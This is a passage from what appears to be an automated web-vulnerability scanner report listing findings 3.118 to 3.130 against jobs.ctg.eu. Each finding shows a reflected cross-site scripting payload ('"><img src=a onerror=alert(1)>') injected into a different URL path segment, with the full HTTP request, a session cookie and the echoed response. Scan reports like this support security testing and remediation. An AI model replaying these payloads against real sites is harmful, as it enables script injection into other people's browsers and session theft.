Request

GET /sites115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1/all/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites115eb"><img src=a onerror=alert(1)>d9768e149d1-all-themes-threesixty-css-structure.css not-front not-logged-in page-sites115ebimg-srca-onerroralert1d9768e149d1 no-sidebars">
...[SNIP]...

3.118. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe was submitted in the REST URL parameter 2. This input was echoed as fc85a"><img src=a onerror=alert(1)>dc393d248fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allfc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allfc85a"><img src=a onerror=alert(1)>dc393d248fe-themes-threesixty-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.119. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b was submitted in the REST URL parameter 3. This input was echoed as 68189"><img src=a onerror=alert(1)>e75acd7573b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes68189"><img src=a onerror=alert(1)>e75acd7573b-threesixty-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.120. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54 was submitted in the REST URL parameter 4. This input was echoed as f73e8"><img src=a onerror=alert(1)>3a70b67ec54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixtyf73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixtyf73e8"><img src=a onerror=alert(1)>3a70b67ec54-css-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.121. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d was submitted in the REST URL parameter 5. This input was echoed as 89175"><img src=a onerror=alert(1)>0ae966e8e0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css89175"><img src=a onerror=alert(1)>0ae966e8e0d-structure.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.122. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728 was submitted in the REST URL parameter 6. This input was echoed as 4b2b6"><img src=a onerror=alert(1)>3c9d629728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/structure.css4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-structure.css4b2b6"><img src=a onerror=alert(1)>3c9d629728 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.123. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf was submitted in the REST URL parameter 1. This input was echoed as 1c822"><img src=a onerror=alert(1)>883740fafdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf/all/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites1c822"><img src=a onerror=alert(1)>883740fafdf-all-themes-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites1c822img-srca-onerroralert1883740fafdf no-sidebars">
...[SNIP]...

3.124. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428 was submitted in the REST URL parameter 2. This input was echoed as f2148"><img src=a onerror=alert(1)>5cc8b9e6428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allf2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allf2148"><img src=a onerror=alert(1)>5cc8b9e6428-themes-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.125. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68 was submitted in the REST URL parameter 3. This input was echoed as 555a2"><img src=a onerror=alert(1)>14329ddbf68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes555a2"><img src=a onerror=alert(1)>14329ddbf68-threesixty-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.126. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03 was submitted in the REST URL parameter 4. This input was echoed as 7d94b"><img src=a onerror=alert(1)>d650ca39f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty7d94b"><img src=a onerror=alert(1)>d650ca39f03-js-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.127. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03 was submitted in the REST URL parameter 5. This input was echoed as 867ae"><img src=a onerror=alert(1)>ab43a14ef03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js867ae"><img src=a onerror=alert(1)>ab43a14ef03-AC-RunActiveContent.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.128. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747 was submitted in the REST URL parameter 6. This input was echoed as bf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/AC_RunActiveContent.jsbf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-AC-RunActiveContent.jsbf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.129. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611 was submitted in the REST URL parameter 1. This input was echoed as 9369b"><img src=a onerror=alert(1)>60bd3b3e611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611/all/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9369b"><img src=a onerror=alert(1)>60bd3b3e611-all-themes-threesixty-js-easyTooltip.js not-front not-logged-in page-sites9369bimg-srca-onerroralert160bd3b3e611 no-sidebars">
...[SNIP]...

3.130. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb was submitted in the REST URL parameter 2. This input was echoed as b7318"><img src=a onerror=alert(1)>5390e89c2cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

